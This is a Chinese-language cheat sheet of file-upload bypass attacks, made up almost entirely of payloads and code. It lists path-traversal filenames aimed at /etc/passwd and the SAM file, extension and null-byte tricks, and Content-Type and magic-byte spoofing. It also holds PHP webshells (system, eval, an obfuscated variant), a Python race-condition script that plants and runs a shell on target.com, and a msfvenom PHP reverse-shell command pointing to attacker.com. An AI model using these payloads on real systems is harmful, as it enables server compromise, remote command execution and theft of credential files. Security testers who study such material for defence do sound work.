// 可被绕过
if (!file.name.endsWith('.jpg')) {
  alert('只允许上传图片');
}

// 危险代码
if (pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION) == 'jpg') {
  move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $filename);
}

filename: ../../../etc/passwd
filename: ..\..\..\windows\system32\config\sam

uploads/1.jpg
uploads/2.jpg

shell.php.jpg
shell.jpg.php

shell.PHP
shell.PhP

Content-Type: image/jpeg
# 但文件内容是PHP代码

// 在PHP代码前添加图片头
GIF89a<?php phpinfo(); ?>

shell.php.xxx  # Apache可能解析为PHP

shell.asp;.jpg
shell.asp:.jpg

shell.jpg%00.php

# 上传.php文件，在上传完成但删除前访问
import requests
import threading

def upload():
    files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>')}
    requests.post('http://target.com/upload', files=files)

def access():
    time.sleep(0.1)
    requests.get('http://target.com/uploads/shell.php?cmd=id')

threading.Thread(target=upload).start()
threading.Thread(target=access).start()

<?php system($_GET['cmd']); ?>

<?php eval($_POST['a']); ?>

<?php
$_GET['cmd']($_POST['a']);
// 使用: ?cmd=system

AddType application/x-httpd-php .jpg

GIF89a
<?php
phpinfo();
?>

# 使用工具将PHP代码嵌入PNG
python3 png2php.py shell.php shell.png

# 上传包含PHP代码的图片
# 然后通过文件包含执行
?file=uploads/shell.jpg

shell.php.jpg
shell.php;.jpg
shell.php%00.jpg

shell.PHP
shell.PhP

shell.php.
shell.php 
shell.php%20

Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif

// JPEG
\xFF\xD8\xFF\xE0<?php phpinfo(); ?>

// GIF
GIF89a<?php phpinfo(); ?>

// PNG
\x89\x50\x4E\x47<?php phpinfo(); ?>

<?= system($_GET['cmd']); ?>

<?php
$a='sys';
$b='tem';
$a.$b($_GET['cmd']);

# 使用各种技术测试文件上传
python upload_bypass.py -u http://target.com/upload -f shell.php

# 生成各种WebShell
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -f raw > shell.php